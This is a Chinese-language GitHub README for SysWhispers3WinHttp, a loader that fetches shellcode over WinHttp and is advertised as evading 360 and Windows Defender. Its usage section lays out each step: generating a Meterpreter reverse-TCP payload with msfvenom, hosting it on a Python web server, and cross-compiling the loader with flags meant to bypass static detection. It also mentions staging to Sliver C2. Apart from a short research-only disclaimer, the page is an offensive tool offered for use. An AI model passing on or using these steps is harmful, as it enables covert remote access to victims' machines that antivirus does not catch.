J0J0Xsec / SysWhispers3WinHttp

SysWhispers3WinHttp 基于SysWhispers3增添WinHttp分离加载,可免杀360核晶与Defender等杀软。(2023/06/06更新)

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

SysWhispers3WinHttp

SysWhispers3WinHttp 基于SysWhispers3增添WinHttp分离加载,可免杀360核晶与Defender等杀软。

0x00 免责声明:

该项目仅供安全研究使用,禁止使用该项目进行违法操作,否则由使用者承担全部法律及连带责任。

0x01 更新日志:

2023/06/06 支持64位GCC编译与Stager方式上线SliverC2,增添编译参数绕过静态检测。

0x02 使用:

// 1. 使用msfvenom生成Shellcode(或使用CobaltStrike生成Stageless之Shellcode)
msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.1.110 lport=4444 -f raw -o beacon.bin

// 2. 使用python3开启Web服务(或使用CobaltStrike之Host File功能)
python3 -m http.server

// 3. 修改SysWhispers3WinHttp.c第40行IP地址,使用Linux64位GCC进行交叉编译
x86_64-w64-mingw32-gcc -o SysWhispers3WinHttp.exe syscalls64.c SysWhispers3WinHttp.c -masm=intel -w -s -lwinhttp -O1

// ps. 或修改SysWhispers3WinHttp.c第4行头文件为syscalls.h,修改第40行IP地址,使用Linux32位GCC进行交叉编译
i686-w64-mingw32-gcc -o SysWhispers3WinHttp.exe syscalls.c SysWhispers3WinHttp.c -masm=intel -w -s -lwinhttp

0x03 演示:

360核晶(2023/06/06更新) 360

Defender WD

微步云沙箱 threatbook

0x04 参考:

https://github.com/klezVirus/SysWhispers3

https://learn.microsoft.com/zh-cn/windows/win32/api/winhttp/nf-winhttp-winhttpconnect

About

SysWhispers3WinHttp 基于SysWhispers3增添WinHttp分离加载,可免杀360核晶与Defender等杀软。(2023/06/06更新)

License:Apache License 2.0


Languages

Language:C 100.0%